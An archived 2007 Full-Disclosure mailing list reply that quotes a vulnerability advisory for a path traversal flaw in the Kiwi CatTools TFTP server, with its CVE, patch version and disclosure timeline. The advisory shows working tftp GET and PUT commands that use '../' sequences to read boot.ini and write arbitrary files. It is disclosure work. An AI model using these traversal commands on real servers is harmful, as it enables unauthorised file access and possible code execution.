[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [Full-disclosure] Kiwi CatTools TFTP server path traversal

To: "noreply" <noreply@xxxxxxxxxxxxx>
Subject: Re: [Full-disclosure] Kiwi CatTools TFTP server path traversal
From: 3APA3A <3APA3A@xxxxxxxxxxxxxxxx>
Date: Tue, 27 Feb 2007 18:17:45 +0300

Probably, it's same or related issue for reported by nicob at nicob.net.
http://securityvulns.com/news/KIWI/CatTools/DT.html
CVE-2007-0888

--Wednesday, February 28, 2007, 12:47:17 AM, you wrote to 
bugtraq@xxxxxxxxxxxxxxxxx:

n> Path traversal security vulnerability in Kiwi CatTools TFTP up to 3.2.8
n> server can lead to information disclosure and remote code execution

n> Risk: High

n> DISCUSSION


n> Kiwi CatTools TFTP server doesn't properly verify filename in PUT and GET
n> request which can be used to download/upload any file from/to server.
n> Default setting allows replacing of existing files. Such settings lead to
n> probability to replace an executable files and run code on attacker choice.

n> EXAMPLES

C:\>>tftp -i 10.1.1.2 GET /x/../../../../../boot.ini boot.txt

n> Transfer successful: 212 bytes in 1 second, 212 bytes/s

C:\>>type boot.txt

n> [boot loader]
n> timeout=30
n> default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS

C:\>>tftp -i 10.1.1.2 PUT boot.txt /x/../../../../../pttest.txt

n> Transfer successful: 212 bytes in 1 second, 212 bytes/s

C:\>>type pttest.txt

n> [boot loader]
n> timeout=30
n> default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS

C:\>>

 

n> SOLUTION

 

n> Upgrade to CatTools 3.2.9 which is available for download at
n> <http://www.kiwisyslog.com/downloads.php>
n> http://www.kiwisyslog.com/downloads.php

 

 

n> CREDITS

 

n> Sergey Gordeychik of Positive Technologies (www.ptsecurity.com)

n> DISCLOSURE TIMELINE

 

n> Vulnerability discovered:           11/20/2006

n> Initial vendor contact:                12/08/2006

n> Patch released:                         02/13/2007

n> Public disclosure:                      02/27/2007

 



-- 
~/ZARAZA http://securityvulns.com/
Пока вы во власти провидения, вам не удастся умереть раньше срока. (Твен)

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

References:
- [Full-disclosure] Kiwi CatTools TFTP server path traversal
  - From: noreply

Prev by Date: Re: [Full-disclosure] Firefox onUnload + document.write() memory corruption vulnerability (MSIE7 null ptr)
Next by Date: [Full-disclosure] [ GLSA 200702-11 ] MPlayer: Buffer overflow
Previous by thread: [Full-disclosure] Kiwi CatTools TFTP server path traversal
Next by thread: [Full-disclosure] Multiple SQL Injection bugs in TCS website
Index(es):
- Date
- Thread